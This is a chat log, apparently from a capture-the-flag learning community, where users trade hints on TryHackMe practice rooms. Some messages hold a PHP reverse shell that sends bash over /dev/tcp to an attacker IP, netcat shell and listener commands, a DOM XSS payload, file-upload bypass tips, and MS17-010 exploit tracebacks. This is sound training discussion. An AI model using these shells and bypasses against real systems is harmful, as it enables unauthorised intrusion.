#room-hints

1 messages Β· Page 95 of 1

rain latch
#

Not the Attack Machine

white salmon
#

no

#

oh

#

how do i log in usinhg ssh

rain latch
#

May I ask where you got that pepe emoji in your status from? πŸ˜„

rain latch
white salmon
#

could not resolve hostname

inland cargo
white salmon
#

nop can i pm you

rain latch
green minnowBOT
#

Gave +1 Rep to @inland cargo

rain latch
inland cargo
#

You might need to add me first

#

Go ahead

white salmon
#

Hey!

#

I need some hint for theseus, i'm stuck with the crypto stuff :///

#

I think it's rail fence cipher

ripe owl
#

anybody available for a hint for priv esc on cold vvars room?

inland cargo
#

Check env.

ripe owl
green minnowBOT
#

Gave +1 Rep to @inland cargo

white salmon
#

Im a bit confused on Socat, how do these relays work? I kind of understand it but im a bit confused how the shell will be forwarded to the relay if the relay doesn't have the target that we want a shell on in the syntax?

#

like this diagram, so if I ran i.e nc 127.0.0.1 8000 -e /bin/bash on a target deeper in the network, the relay would catch that and forward it to the kali machine?

#

ohhh yeah i think i kinda get it now actually

#

if i ran a shell on a target with 127.0.0.1 port 8000, and port 8000 is linked to the relay, of course the relay would catch it. Have I understood this right?

tardy pendant
#

Im at the OWASP T10 at XXE and im trying to find a SSH key location.

Afaik i can only read files but not directories. I also cant pass any commands to the parser.

I only know that the directory must be /home/falcon/.ssh/******

Any hints on how to solve this?

rain latch
tardy pendant
#

I somehow thought the keys themselves are named private* somewhat

#

Thanks for the help

rain latch
#

Your welcome πŸ˜„

tardy pendant
#

Im always overcomplicating things. notlikedva

#

kali also messed my thoughts up cause i was looking for the path over there and saw it was /.ssh/authorized_keys/[keys]

rain latch
tardy pendant
#

Yeah. That reminded me that i should reread SSH stuff 02calc

white salmon
#

you are searching for an rsa private key

tardy pendant
#

yep ive did that. the .ssh was a easy guess anyway. i just got confused by not remembering ssh keys name and then overcomplicating things lmao. the whoe thing was so obvious but hey, why not wasting an hour by needlessly modifying the payload. at least ive seen some different XXE payloads now SCshake

ivory magnet
#

Anyone have the walkthrough of attacktive directory

oblique plank
#

Network Services -Task 10. What is the estimated time of completion using bruteforce? Just in this instance.

tranquil sandal
#

For the Coldvvars room so annoying. Times out all the time.
I cannot even connect now, terminated twice and waiting more than 5 mins .The site doesn't show up :/

bold lichen
#
     command: /usr/bin/python -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"'; __file__='"'"'/tmp/pip-install-6xgk8mn5/wsgiref/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' egg_info --egg-base /tmp/pip-pip-egg-info-gr1eepq3
         cwd: /tmp/pip-install-6xgk8mn5/wsgiref/
    Complete output (8 lines):
    Traceback (most recent call last):
      File "<string>", line 1, in <module>
      File "/tmp/pip-install-6xgk8mn5/wsgiref/setup.py", line 5, in <module>
        import ez_setup
      File "/tmp/pip-install-6xgk8mn5/wsgiref/ez_setup/__init__.py", line 170
        print "Setuptools version",version,"or greater has been installed."
                                 ^
    SyntaxError: Missing parentheses in call to 'print'. Did you mean print("Setuptools version",version,"or greater has been installed.")?
    ----------------------------------------
ERROR: Command errored out with exit status 1: python setup.py egg_info Check the logs for full command output.
WARNING: You are using pip version 20.2.2; however, version 21.1.3 is available.
You should consider upgrading via the '/usr/bin/python -m pip install --upgrade pip' command.```
#

doing this room called ZTH obscure web vulns

#

but i am facing this issue while install tplmap

#

can some one help me

white salmon
#

Can you give me a little more indian?

covert basalt
#

Which stage you are at?

white salmon
#

find usernames & pass

covert basalt
#

Checked the first hint?

#

Checked the room tags?

white salmon
#

I didn't understand the room tags.

covert basalt
#

Have you tried reading resources on the room tags from internet

white salmon
#

Of course it's

#

but I don't get it

covert basalt
#

You got the login page?

#

Try the vuln on the page

white salmon
covert basalt
#

Try the vuln mentioned in tags

white salmon
#

thx.

candid nimbus
bold lichen
white salmon
#

anyone did theseus?

burnt current
#

please where can i get the flag in root.txt for CCPENTESTING room

rain latch
candid nimbus
ripe hedge
covert basalt
#

πŸ₯²

proud needle
white salmon
potent schooner
#

Anyone know the best way to exploit sudo -l of /etc/init.d/cron? I'm stuck on this one and yes I'm a rookie lol

worn otter
#

gtfobins ?

potent schooner
#

I didn't see a listing specifically for /etc/init.d/cron

urban fern
#

Am I doing something wrong here? It says Hello, doesn't it?

ember cosmos
#

Need Hint Regarding "Overpass"
Can anyone tell me which Owasp top 10 vuln should I test on this?

quick furnace
#

Hi everyone... I am stuck in Linux Fundamentals Room 3 in the Pre-security path. I try to connect to the MACHINE_IP using "ssh tryhack@MACHINE_IP", but it responds that the connection was refused at port 22... I have tried this twice. Twice meaning 2 times {start machine->start attackbox->ssh from attackbox terminal->refused->again ssh->refused->terminate attackbox->terminate machine}. still doesn't help. Any idea?

white salmon
#

ssh tryhackme@"roommachineip"

rain latch
#

||if so then you might take a look at bypassing||

ember cosmos
#

No

#

I was referring to Overpass 1

rain latch
#

uhhh

#

That's what I just said

rugged flame
#

in "The find command" how to make perm parameter correct?
"**** / ***** * ***** **** ***** **.***"

river delta
#

in the find command room, shouldn't the 3rd answer be: find / -type d -name "exploits"

rain latch
rain latch
rugged flame
river delta
#

hmmmmm

#

still don't get it ahaha

rain latch
#

not just the file "exploit"

river delta
#

ok

#

nice hint

#

hahahahah

#

thanksss

rugged flame
rain latch
rugged flame
#

"The find command"

rain latch
#

No -o=w is fine but why are you looking inside /usr/bin ?

rugged flame
#

oh, idk
thanks)

rain latch
#

πŸ˜„

ivory magnet
#

Anyone have the walkthrough of attacktive directory

fervent pecan
#

Hello. I'm new to the discord so i'm still not very sure on how to approach topics on here (despite having read the rules and introduction)
I'm currently doing the Complete Beginner Path -> Network Exploitation Basics -> Network Services -> Task 6: Enumerating Telnet -> question 6.
I'm not sure on how to express some of my doubts or ask for a very gray hint on the subject so i'll just say this for now :/ πŸ˜…

astral smelt
oblique plank
#

i think it's even mentioned in the scan if you read through it

fervent pecan
#

@astral smelt Thank you for the hint! Some answer templates really confuse me and i start to do research on my own doubts πŸ˜† thank you again

green minnowBOT
#

Gave +1 Rep to @astral smelt

quick furnace
#

On the Kali Linux terminal, how do I know the openvpn is connected or not? The last line I see is "Initialization Sequence Completed"
And then blank. Nothing of the sort lik showing a directory or something. The line below is blank, though it accepts cursor input... I tried the room https://tryhackme.com/room/openvpn. It helped for Windows, but nothing much for Kali Linux. Am I missing something? Please help.

#

I tried entering ssh tryhackme@"IP", but it still stayed blank after that input... then I "ctrl+c"-ed to come back to the terminal default operation of showing the working directory.

white salmon
#

you will need to open another terminal, in order to connect if you didn't put your openvpn on background

#

normally with "ip a" you will see a tun0 interface with your current IP on the VPN

quick furnace
#

You mean I can't work on the same terminal? Wait let me try once...

white salmon
#

sudo openvpn xxx.ovpn &

#

if you want to have it in the same terminal

#

it will go in background as a job

quick furnace
#

Can I text you personally N1M, if you don't mind? I think I would like to clarify a few things too that I didn't mention, don't wanna mess the room up πŸ˜…

white salmon
#

yes you can

wanton axle
#

Hi guys..I'm stuck on SteelMountain. How can you replace a file that runs? I can't kill the process as i don

#

as i dont have permission*

white salmon
#

stop the service

light tundra
#

Stuck on my first CTF practice πŸ™‚ Stuck on Root Me CTF, trying to upload reverse shell. No matter what I put in the file with PHP/reverse shell, I don't see anything on the listener 😦

rain latch
light tundra
#

||<?php
exec("sudo /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'");

extension shell.php.jpg||

#

(i'm pretty sure I don't know what I'm doing)

rain latch
#

Hmm shell should work else give the pentestmonkey php shell a try ||and dont use jpg as the file extension but an alternative php extension||

light tundra
rain latch
#

yea that'd be one example

light tundra
#

...do I literally just upload this? haha

white salmon
#

changing with your ip should be fine πŸ™‚

light tundra
#

looks like it just goes through a bunch of methods?

rain latch
#

Adjust the IP and port and then you are ready to go

light tundra
#

okay cool, i saw those in the file a second ago

#

hmm

#

doesn't seem to work using either open port

rain latch
#

Which port are you using?

light tundra
#

22 & 53

#

let me scan it again

rain latch
#

You should do the "What the shell" room or what it was called on THM

light tundra
#

fucking 80

rain latch
#

you obviously can't use 22 because that'S used by SSH already

light tundra
#

is that a shell room?

rain latch
#

use 4444 for example

light tundra
#

ohhh

rain latch
white salmon
#

on your local machine you need to : nc -lvnp 4444

light tundra
#

okay

white salmon
#

matching the one in the php file πŸ˜›

light tundra
#

well yes

#

lol

#

will this help me with scripting and stuff? That intimidates me...

rain latch
#

no

#

but you usually don't script your reverse shells from scratch

light tundra
#

okay

light tundra
#

I don't need to escalate priveleges yet, do i

white salmon
light tundra
#

okay cool that's what I was thinking

white salmon
#

[SOLVED] I would like to request a hint for Network Services room on task 4(Exploiting SMB), at the end question with the flag. I have to figure out the username of this particular person in order to ssh into the work server. But it seems I'm brute forcing at this point and I'm wondering if there is somewhere I should be looking where I haven't already.

#

Where I looked so far: ||the .txt document in the profiles share only so far. Another share is open but that doesn't seem to contain anything. There was one .txt file where I picked up the name of a person and I already picked up the identity file for use with SSH service. I keep receiving a port 22 connection close with every different concatenation of the person's name as username for ssh.||

river mantle
#

Any tip on Revenge room?

I only got the first flag down, and I have the database dump but I don't seem to know what to do if the password encryption is secure against lookups

#

Nevermind finally bruteforced one user found the password

summer isle
#

can anyone give me a nudge on coldvvars room for foothold? I did everything i can on enumeration and still not able to get a way in (i can tell you more on what I have done till now in the dms)

sage whale
#

For SteelMountain, would you use the AbuseFunction (from running Invoke-AllChecks) to replace the file with the one generated from msfvenom?

spare halo
#

Im doing Upload Vulns room, for client side filtering, I viewed the source code but it doesnt show anything saying file type. How do I know what file type is available on the website then?

rain latch
# spare halo

If you cannot gain information from the javascript source code it's simply trying until you find it

spare halo
#

Okay, i did try it using an extension that is allowed, but even if I successfully uploaded the file to the server, there is still no response saying the MIME type

vital crown
spare halo
#

Yeah im capturing the responses

#

It doesnt come out as the ones said in the module..atleast

vital crown
#

One of the responses should be the java script file. Let me boot my laptop up. What task is this?

spare halo
#

task 7

#

client side filtering

#

i use png extension

vital crown
#

Ahhh, did you go into options > intercept client requests and remove the reference to ^js$|

spare halo
#

ah i didn't

#

wait i try

vital crown
#

You might have to force refresh the page as well

spare halo
#

Do i have to do that before i intercepted the first response or after I uploaded the file?

vital crown
#

Before the first response if i recall

spare halo
#

Thats weird. still invalid lol

vital crown
#

Want to drop into DM and talk it through?

spare halo
#

sure

bleak rune
#

Web fundamentals XSS Task three part 5, Jacks cookie. Every time I paste the script in it goes to a web page not found. and then I cant go back to the original page? The cookie in the url doesnt work. Burp gives me an attacker errror

#

i get no hints about logs either

white salmon
sage whale
# white salmon You could, but that is not the path the room author suggests.

Hmmm ok I know it says to replace the executable, but I don’t have permissions even after running PowerUp.ps1. I try to rename the service’s exe file to replace with the Advanced.exe from the GitHub, but says I don’t have permissions. I’ll just keep messing with it, thanks (also I stopped the service before attempting to make changes)

green minnowBOT
#

Gave +1 Rep to @queen cliff

white salmon
# sage whale Hmmm ok I know it says to replace the executable, but I don’t have permissions e...

Something sounds not quite right with your approach. A few quick hints that may be helpful: (1) Note the PowerUp script is just for Invoke-AllChecks (in other words, information-gathering; has nothing to do with changing permissions on anything), (2) You can directly ascertain file permissions within meterpreter (where you should find you already have all the permissions you need to replace the file), (3) Why are you getting Advanced.exe from GitHub? Aren't you supposed to generate a payload with msfvenom in this room?

urban fern
#

I'm also on the client-side uploadvulns thing, and it seems like mu burp is just freezing after I press forward? It's just blank

sage whale
green minnowBOT
#

Gave +1 Rep to @queen cliff

spare halo
#

Hi, im having issues with File Upload Vulns room in task 7. I intercepted the request and send a response on client-side js ,the response only shows file.type but nothing of name="fileToUpload" where i can change the file extension. How do i work my way around this?

#

and selecting another file extension from earlier doesnt seem to work either. It says "invalid file type"

spare halo
#

Thanks @vital crown

green minnowBOT
#

Gave +1 Rep to @vital crown

severe wave
#

Hi Sea_Bas, did you solve task3 for CCT2019?

light tundra
#

doing Juice Shop Room, Task 7 β€” Not getting anything after ending JS XSS alert snippet, am I supposed to? Question #2 prompts for an answer or flag but I don't see any generated or any next steps

solemn basin
#

i am having trouble in THM upload vulnerabilities room. the last challenge. after uploading the shell in the format of jpg when i am going to execute it throuth the admin page it showing module does not exist. plz help

rain latch
bleak rune
#

Anything?
Shado_Tek β€” Today at 00:25
Web fundamentals XSS Task three part 5, Jacks cookie. Every time I paste the script in it goes to a web page not found. and then I cant go back to the original page? The cookie in the url doesnt work. Burp gives me an attacker errror

Shado_Tek β€” Today at 00:33
i get no hints about logs either

shut lion
#

Are there any tools I can use in Kali Linux to find the function with ASLR/DEL disabled in https://tryhackme.com/room/brainstorm. and how would I know it actually has ASLR disabled?

rain latch
shut lion
rain latch
shut lion
rain latch
shut lion
rain latch
#

You probably got the file via FTP right?

shut lion
#

@rain latch exactly

rain latch
shut lion
green minnowBOT
#

Gave +1 Rep to @rain latch

rain latch
#

Your welcome πŸ˜„

fleet spire
#

Binary - Shiba1, I created noot.txt and when I did ~/noot.txt it said I dont have permission to it

#

any hints?

glacial gust
#

you need to run the file in folder

fleet spire
#

wdym

#

@glacial gust

glacial gust
#

there should have been a binary already in the folder that you need to run after you create the noot.txt

fleet spire
#

shiba1?

#

~/shiba1?

glacial gust
#

just ./shiba1

fleet spire
#

shouldnt there be a /?

#

also not working

#

it says no such file or directoryu

devout palm
#

then you're not in the correct dir where the binary is

fleet spire
#

How do I go there if so

devout palm
#

you find where the file is and navigate to that directory

#

or you call the binary with absolute path

fleet spire
#

dont know how

glacial gust
#

you should have created the noot.txt in the home directory, the shiba1 is in the same dir

fleet spire
#

I just used the touch function

#

nothing else

glacial gust
#

when you run the shiba1 binary it should work then

fleet spire
#

it doesnt...

#

when I tried to locate shiba it gave no respond

#

when I located noot it just said its in root/

glacial gust
#

if you verify you can post screenshot

#

!docs verify

proud scarabBOT
devout palm
#

@fleet spire I would strongly recommend getting a grasp of operating system fundamentals like listing and finding files, switching working directory and lots of other concepts before trying more advanced concepts like exploitation

#

man ls
man find
pwd, cd and other commands

woven nest
#

Can anyone help out on a Golang server? I'm working on an assessment and never have done one before. Thanks.

random furnace
#

Network Services-Task 9 Enumerating FTP.

My NMAP scan shows only 1 port open, the answer box says I'm wrong. Could someone check I am not going crazy please?

woven nest
#

Try -p- for all ports?

random furnace
#

I'll give it a go, not hopeful though as the one it didn't find is a well known port

rain latch
random furnace
#

I did, and it found it. Is that pretty common for nmap to miss it? That could get quite tedious when scanning all ports.

I am using the attackbox mind, would it be quicker on my own kali box?

#

Thanks for the help @nop @woven nest

green minnowBOT
#

Gave +1 Rep to @woven nest

random furnace
#

@woven nest thanks!

woven nest
#

@random furnace no prob!!

dire otter
#

I'm in room CC:Pen Testing and I'm stuck at section 7, getting the root.txt flag. I have acquired the user.txt flag and tried to privilage escalation script to gain access to root but got no luck. Any hints pls?

dire otter
#

Nvm found it

#

I just need to list the privilage that current user has

plush kelp
#

hello i am trying to get access to eternal blue but i am constanly getting this

#

Exploit completed, but no session was created.

#

room: eternal blue

mental quarry
#

Hi everyone

#

I was working on the Pickle Rick room, and was stuck on the 2nd ingredient. Was hoping if I could get any hint :3

#

I guess this is the right room to ask this

vital crown
tulip mural
mental quarry
mental osprey
#

Hello, I need some help with That's The Ticket

mental quarry
#

But I'm banging my head against the wall for the 2nd one

tulip mural
copper blade
#

Please someone help with this "Pickle Rick room"

I've tried all sorts..
I'm suspecting x-forwarded-for http header for the 403 dir but yet, I can't even bypass the stuff:sob: :sob:

Please hint me up, I hate write-ups:sweat_smile:

keen wharf
#

Hello! Can anyone help me with my last question needed to complete OSQUERY? It's Task 9 Q5, schema for event log data. I thought i had it correct, but it wasn't accepting my answer, so I looked more in depth at the answer format. It seems I'm 6 characters off at the end, but I'm at a loss for what they could be. I have the fields and the types all there, but there's a whole extra word at the end that I can't figure out.

hexed crescent
plush kelp
narrow junco
#

Howdy, I'm in the Practical - Network Simulator part of "Extending Your Network" and the site asks you to send a TCP request from computer 1 to computer 2. Doesn't seem to do anything no matter what I select. Any hints?

mental quarry
# tulip mural Checked the home directory of the user?

Yes, in the home directory itself I found the first one. And there is even a clue.txt file which says to look in the file system to find the 2nd one. The problem is I can't navigate myself out of the home directory. cd or cat doesn't work.

tulip mural
plush kelp
mental quarry
fleet spire
loud nebula
hearty widget
#

Any hints for riddlemethis question 2? I know what it is but still can't work it out. (even automated doesn't work 😦 )

graceful grove
#

Anyone working in Diana initiative CTF??

safe lagoon
#

Anyone working on Linux Fundamental part 3 please

rain latch
#

Why do you want to analyze it on Linux?

#

it is a windows binary

#

Yea it is a windows executable running on a linux machine

#

πŸ˜‰

#

yea

#

your welcome

tulip mural
plush trench
#

yo wz poppin i need help on the room GamingServer, i've the user flag but i dunno the next step, can someone push me in the right direction?

mental quarry
green minnowBOT
#

Gave +1 Rep to @tulip mural

dry gate
#

I have a question about subnets. As far as I know, they're a network in a network (as the name suggests). I'm always confused by this sort of stuff though where it asks to write out the ip. Could someone help me understand this a bit better or point me in the right direction please? Thank you in advance vent

plush trench
#

You split the network and client scope of a network, an ipv4 address has 32 bits, with the /** you tell how many bits re for the network

#

/24 means a subnet mask like 255.255.255.0 ( binary 11111111.11111111.11111111.0) so in the network 178.18.1.0/24 - 178.18.1. is the network and 178.18.1.1-254 re the clients

#

Help me with GamingServer root

dry gate
#

hmmmm okok

#

thank you for the explanation :D

dry gate
plush trench
#

There are videos on yt

#

A room, i want a hint

south niche
#

Hi Carbon based lifeforms , i been stuck on the exploit 42315.py having some errors can somebody help me ? im pretty sure the exploit is for python 2 , i cant seems to make it work after going around it for a few day (im not the best on python,yet)

#

python3 42315.py 10.10.117.156 1 β¨―
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: samr
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 998, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 834, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 489, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/42315.py", line 333, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str

#

python3 zzz_exploit.py 10.10.117.156 1 β¨―
Target OS: Windows Server 2016 Standard Evaluation 14393
Using named pipe: spoolss
Traceback (most recent call last):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 1057, in <module>
exploit(target, pipe_name)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 835, in exploit
if not info['method'](conn, pipe_name, info):
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 490, in exploit_matched_pairs
info.update(leak_frag_size(conn, tid, fid))
File "/home/odcr/Desktop/THM/Relevant/MS17-010/zzz_exploit.py", line 334, in leak_frag_size
req1 = conn.create_nt_trans_packet(5, param=pack('<HH', fid, 0), mid=mid, data='A'*0x10d0, maxParameterCount=GROOM_TRANS_SIZE-0x10d0-TRANS_NAME_LEN)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 349, in create_nt_trans_packet
_put_trans_data(transCmd, param, data, noPad)
File "/home/odcr/Desktop/THM/Relevant/MS17-010/mysmb.py", line 73, in _put_trans_data
transData = ('\x00' * padLen) + parameters
TypeError: can only concatenate str (not "bytes") to str

plush trench
#

ah finished gameserver, sometimes your stuff comes per ship and than it may takes longer, but finally it has arrived

ripe hedge
#

Also I'm pretty sure that machine is not vulnerable to that exploit

#

Also also that exploit is likely written for python3 not python3

south niche
green minnowBOT
#

Gave +1 Rep to @ripe hedge

ashen matrix
opaque fog
#

In network services 2, task 4, I managed to get shell as root, but can't seem to find the root flag. What am I missing?
cappucino@polonfs:~$ ./bash -p
bash-4.4#

rain latch
south niche
spark bolt
#

how to do this from HTTP in detail, Task 7

rain latch
spark bolt
#

I dont understand it

#

what to set to value 1?

spark bolt
rain latch
#

That's the parameter you have to create

spark bolt
#

and I type idparameter?

#

I set it but still nth

spark bolt
rain latch
spark bolt
#

thanks im dumb

safe hamlet
#

I'm in a room that is called Introductory Networking and I get the question "What kind of protocol is TCP?". I may seem very stupid but could someone help me with this question?

rain latch
green minnowBOT
#

Gave +1 Rep to @rain latch

green minnowBOT
#

Gave +1 Rep to @rain latch

rain latch
#

Your welcome πŸ˜„

green minnowBOT
#

Gave +1 Rep to @near flame

nova agate
#

hi in the room "network services" at "exploiting SMB" there a question im stuck at: " Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?"

#

do they ask about what username the profile folder belongs to?>

graceful marsh
#

can i get a hint for the picklerick CTF?

so far I've used gobuster to find directories, nmap to scan some ports, and checked the source code for a username, not sure where to go from here.

opaque fog
ashen bronze
nova agate
#

i actually did that already thanks!

ashen matrix
graceful marsh
#

hmm

white salmon
#

I have tried accessing the successfully uploaded PHP reverse shells in Task 9(Magic Numbers) of File Upload Vulnerabilities room and for the majority of extensions I get "The image cannot be displayed because it contains errors" and for ||.phps files I get Forbidden for both /assets and /graphics paths||. I have set up a netcat listening port as well on the default pentestmonkey shell port 1234 but nothing so far.
Any hints would be great thank you.

ashen matrix
ashen matrix
white salmon
white salmon
#

Oh for crying out loud

#

I finally go it! I didn't include the 6 characters before editing in the hex string for the appropriate file signature.

#

I forgot that step.

upper shore
#

jalapenyoo I had the exact same question. Thanks for asking that haha. I am only using 4 digits. does that make a difference ?

steady fern
#

Hi everyone, I'm in OWASP Juice Shop task 7 Question #1: Perform a DOM XSS. After searching here and seeing some of the same issues but not finding the answer (I've double checked the question and the input: <iframe src="javascript:alert('xss')">). I get the pop up but no flag. Would someone point me in the right direction?

#

When I copy and paste into my browser and not manually input it in the browser kali box, I got the flag. I'm still confused because I don't see a difference.

#

Nevermind, wrong character... DOH

white salmon
# upper shore jalapenyoo I had the exact same question. Thanks for asking that haha. I am only...

I want to say yes because in the jpeg example magic numbers the string was 4 letters which is 4 bytes long the same byte count as the signature for jpeg and so the editing was 4 bytes of hexadecimal digits replacing the already reserved slots that was marked from the ascii AAAAs. So based on the example I think it does matter that how many random alphabet letters you type and so that's why I added 6 As so that it matches the byte size of the file signature in question in the task flag question.

#

But if you want to double check definitely do 4 only and see if you get a error like I did which would mean you DO need the length being appropriate to the signature of the whitelisted content type.

pearl rivet
#

Anyone having trouble with the Internal Room ? When I try to access internal blog I got this page, and I'm not able to access the log-in page propely. Always having issue with Server Not Found.

trim haven
#

Add it to your hosts file :)

narrow junco
#

So I'm on Exploiting SMB and I'm having issues with accessing documents in the profiles share. I'm logged in, I can ls the files, but I'm unsure how to open them to read and google has been of little help. I've tried linux commands nano, cat, etc and the SMB command of "open" but it just tells me file not found.

Also When working with a document with space "Working From Home Information.txt" I try putting underscores where spaces would be but I get the same file does not exist error. Any help?

glacial gust
#

you need to get the files to your local machine, for the one with spaces have you tried just putting quotes around it

narrow junco
glacial gust
#

you don't have to put the destination, it will use the folder you are in

narrow junco
green minnowBOT
#

Gave +1 Rep to @glacial gust

glacial gust
#

np

narrow junco
#

But get does not work for .ssh files

#

hmm

#

nvm it;s a directory

narrow junco
#

I'm in the Network services section Enumerating Telnet and it asks me what port is open.

I see 3 ports open 22/tcp, 139/tcp and 445/tcp. I put 3. Wrong. I put 1 and it's correct. This is confusing. Now it's asking what port is open looks like 4 characters, but I tried all those ports and it's still not working. I don't see any other ports open via nmap. Very confusing

white salmon
#

I'm doing Pickle Rick room and I am stuck in logging into Rick's computer. I found ||the username and I know there is a ssh service available on Rick's computer however after attempting to brute force password using Hydra I receive an error saying this server doesn't support password authentication and by transition when I ssh using the login name I get an error which I am looking up at the moment, and it means there is public key authentication. But I am stuck here. I also know that id_rsa is the identity file starting with ssh version 2 but that would require it being on the server itself wouldn't it? I have no access to that.||
Just a small hint is fine.

ashen matrix
white salmon
ashen matrix
#

DM me if you need anymore hints. I won't be giving you answers

white salmon
#

@ashen matrix ok thanks

green minnowBOT
#

Gave +1 Rep to @ashen matrix

white salmon
#

Found something! haha amazing thanks again!

subtle socket
#

Room ustoun, I am able to get sql username and password, but cannot get sql shell?

empty roost
#

Looking for a nudge on internal, I have shell but think I found a rabbit hole for priv esc

worldly tulip
#

Hi, somebody can gimme hint with "Blue"?

glacial gust
hexed kindle
#

So anyone done the metamorphosis room yet?

hexed fog
#

Hello, I'm on the room "wgel" but I'm stuck on start: I already found ||/sitemap|| and the ||id_rsa file|| but now i can't manage to find ||the user associed with the ssh key||. I already tried to ||use the names of the developers on the "about" page, twist them etc|| but I'm out of options

ashen matrix
#

@hexed fog you need to look a little more

#

@hexed fog Maybe a webpage might have some information?

hexed fog
#

Also tried ||the guy from the blog||

#

And ||the people in the templates||

#

well, i've been spoiled when looking for hints but i don't want to go further 'till i understand what to look for so i'll just continue searching and if u have any hint to help where to look at i'd appreciate it

ashen matrix
#

@hexed fog Maybe go beyond the front face of a webpage. Looks at how the webpage is formed. Make sense?

#

I am trying to give you hints without straight up saying where to look lol

hexed fog
#

well, it's just a ||template website|| so i don't see what could be interesting in there

ashen matrix
#

ok maybe my hint wasnt right. maybe you should look at the webpage source code

hexed fog
#

even on the ||contact page|| there's nothing useful

ashen matrix
#

I have told you where to look, the rest is up to you to find it. I referred to my notes and i detailed how i found what youre looking for.

hexed fog
#

yes thx, i'm looking for || made by XXX or something that'd mention the author||

#

but looking each div 's pretty boring xD

random patrol
#

what do i do with the ip address

#

i have no idea what im doing

ashen matrix
hardy umbra
#

Hey, I was solving Attacktive directory Room.
For getting a full-control on the AD-Domain, I can either use Evil-WinRM (as suggested in THM room) or impacket toolkit named psexec.py ...

hardy umbra
#

But I noticed after using both of them to test, that each of them produces different type of shell

#

psexec.py produced: nt authority\system
Evil-WinRM produced: thm-ad\administrator

Any Help??

ashen matrix
# random patrol yeah

You need to use either the attackbox that is built in or download a VM version of Kali Linux or Parrot OS. There are rooms in THM that can guide you through it and I recommend you start there if you are unsure how to proceed

random patrol
#

would that work?

ashen matrix
#

You would also need to download a variety of enumeration tools and other binaries used to decrypt and brute force, etc.

#

I would highly recommend you search for a THM room that is about setting up Kali Linux or using the built in attack box on how to start with TryHackMe

random patrol
#

i dont use linux

ashen matrix
#

Then I cant help you sorry

random patrol
#

np

#

thank you for trying

ashen matrix
#

np. I recommend you learn linux, plent of rooms on THM to help. I didnt use Linux when I first started as well

mental quarry
white salmon
green minnowBOT
#

Gave +1 Rep to @mental quarry

mental quarry
# random patrol i dont use linux

You can download a Kali Linux VM and you should learn a bit of the Linux commands, as learning them and using linux in general would make it easy for you to complete the rooms. To learn linux, you can try Bandit from OverTheWire. It's pretty good for beginners.

mental quarry
willow jetty
#

VulnUniversity : room

#

The operating system question is wrong, tried linux, windows, linux

#

any idea

loud nebula
#

name of the operating system

willow jetty
#

yes

loud nebula
#

yes it is the clue

#

not linux, but what kind of linux

willow jetty
#

What is the most likely operating system this machine is running?

loud nebula
#

nmap scan should gave you the answer if im not mistaken

willow jetty
#

This was the question

#

nmap wont

loud nebula
#

what flag you use to scan

willow jetty
#

-O

loud nebula
#

in one of the service found, is there like a name of linux thing?

willow jetty
#

I am sure its Windows, because port 445 miscrosoft-smb

loud nebula
#

nope

willow jetty
#

But the answer is wrong

#

10.10.229.59

#

target

loud nebula
#

rescan with -A

willow jetty
#

All done, OS is not predictable by nmap

loud nebula
#

I dont mean to be rude, but you know there are "variations" of linux, right? there is this linux, that linux, and so on

willow jetty
#

yeah

#

anyways will check again

#

thnks

loud nebula
#

in one of the port found by nmap, if I remember correctly there should be hint what one of the program is running from

willow jetty
#

Just checking if anyone done for that box

#

yeah hint is -O scan

loud nebula
#

i cant give yu way too much hint, since its pretty much instant answer

willow jetty
#

okk

loud nebula
#

dm if you need more help

willow jetty
#

sure

subtle socket
green minnowBOT
#

Gave +1 Rep to @glacial gust

subtle socket
#

I will give it another shot later tonight and will ping you if necessary.

#

Thanks again. @glacial gust

rugged flame
#

Regular expressions
it seems to be working, but the answer is incorrect.
need hint how to pass this task)

rugged flame
#

same here(

rugged flame
#

no, | is shown in next task

ripe hedge
#

[ch] then

rugged flame
green minnowBOT
#

Gave +1 Rep to @ripe hedge

ripe hedge
rugged flame
#

ahah, ok. got it

ripe hedge
#

yours works as well

rugged flame
#

does ^ works as beginning of line and as 'not' simultaneously, or it has to be \D

ripe hedge
#

answer tolerance doesn't take case into account I think

#

refresh the page

rugged flame
#

it worked, but it seems for me, there have to be \D
it might be case sensitive in this room

ripe hedge
rugged flame
#

understandable )

azure nova
#

initial nudge on Metamorphosis?

empty roost
#

Anyone completed internal? I’m stuck on priv esc

ripe hedge
#

poke at any unusual services

empty roost
#

I’m avoiding watching the video walk through but… I’m stuck right now haha

ripe hedge
#

should be an internal service lying around

empty roost
#

I had to use the video but I learned tools don’t always help and you need to look with your eyes… sometimes stupid files are left around

#

I already had the internal service, and shell on the box and the service

burnt ridge
#

Hello

#

did anyone found the DoB of OWoodflint ?

glacial gust
burnt ridge
#

A private hackathon.. we have that question at the end

dim sequoia
#

First time here, not sure if this is the right room or not. Please read my question below.
My issue is I'm not seeing the answer they want in the title that was returned to me. NMAP Command run is "nmap -A [IP]"
Based on the title returned to us, what do we think this port could be used for?

#

Room is "Network Services"

glacial gust
#

which section

white salmon
dim sequoia
#

